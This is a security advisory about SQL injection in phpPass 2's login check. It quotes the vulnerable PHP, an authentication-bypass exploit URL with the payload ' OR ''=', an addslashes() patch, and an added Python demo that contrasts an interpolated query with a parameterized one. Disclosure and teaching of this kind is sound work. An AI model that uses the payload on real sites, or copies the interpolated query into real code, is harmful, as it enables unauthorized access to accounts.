20th Jan 2003 [SBWID-5937]
COMMAND
phpPass sql injection
SYSTEMS AFFECTED
phpPass 2
PROBLEM
Frog Man [[email protected]] found :
http://www.frog-man.org/tutos/phpPass.txt
PHP Code/Location :
accesscontrol.php :
------------------------------------------------
[...]
session_register("uid");
session_register("pwd");
[...]
$sql = "SELECT * FROM user WHERE
userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
session_unregister("uid");
session_unregister("pwd");
?>
<html>
<head>
<title> Access Denied </title>
[...]
exit;
[...]
------------------------------------------------
Exploit :
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
SOLUTION
A patch can be found on http://www.phpsecure.org
Patch :
In accesscontrol.php, replace the lines :
-------------------------------------------------
$sql = "SELECT * FROM user WHERE
userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------
by :
------------------------------------------------------------------------
$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------------------------------
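The following is an added example, not code from the advisory, from Frog Man or from phpPass. It re-creates the accesscontrol.php query logic in Python against an in-memory SQLite table so the effect of the exploit string above and of the fix can be checked side by side: the interpolated query is run with the advisory's payload (URL-decoded to ' OR ''=') and matches every row, so the mysql_num_rows() == 0 check would never fire; the hardened version binds the values as parameters instead of escaping them with addslashes(), which is the approach preferred over escaping in current code. The table contents are constructed sample data.

```python
import sqlite3

# Constructed sample rows standing in for phpPass's `user` table (not from the advisory).
SAMPLE_USERS = [
    ("alice", "s3cret"),
    ("bob", "hunter2"),
]

# The advisory's exploit value, URL-decoded: ' OR ''='
INJECTED_VALUE = "' OR ''='"


def make_db():
    """Create an in-memory database with a `user` table shaped like the one phpPass queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (userid TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login_rows(conn, uid, pwd):
    """Mirror of the original accesscontrol.php: user input is interpolated into the SQL text.

    With INJECTED_VALUE for both fields the statement becomes
    SELECT * FROM user WHERE userid = '' OR ''='' AND password = '' OR ''=''
    and the trailing OR ''='' is true for every row.
    """
    sql = f"SELECT * FROM user WHERE userid = '{uid}' AND password = '{pwd}'"
    return conn.execute(sql).fetchall()


def parameterized_login_rows(conn, uid, pwd):
    """Hardened form: the driver binds the values, so quotes inside them stay data."""
    sql = "SELECT * FROM user WHERE userid = ? AND password = ?"
    return conn.execute(sql, (uid, pwd)).fetchall()


def demo():
    """Return the row counts the original check (mysql_num_rows == 0) would have seen."""
    conn = make_db()
    results = {
        "vulnerable_injected": len(vulnerable_login_rows(conn, INJECTED_VALUE, INJECTED_VALUE)),
        "parameterized_injected": len(parameterized_login_rows(conn, INJECTED_VALUE, INJECTED_VALUE)),
        "parameterized_valid": len(parameterized_login_rows(conn, "alice", "s3cret")),
        "parameterized_wrong_pwd": len(parameterized_login_rows(conn, "alice", "nope")),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, count in demo().items():
        print(f"{name}: {count} row(s)")
```

Running the script shows the interpolated query returning both sample rows for the injected value while the parameterized query returns none, and the parameterized query still returns exactly one row for a correct userid/password pair.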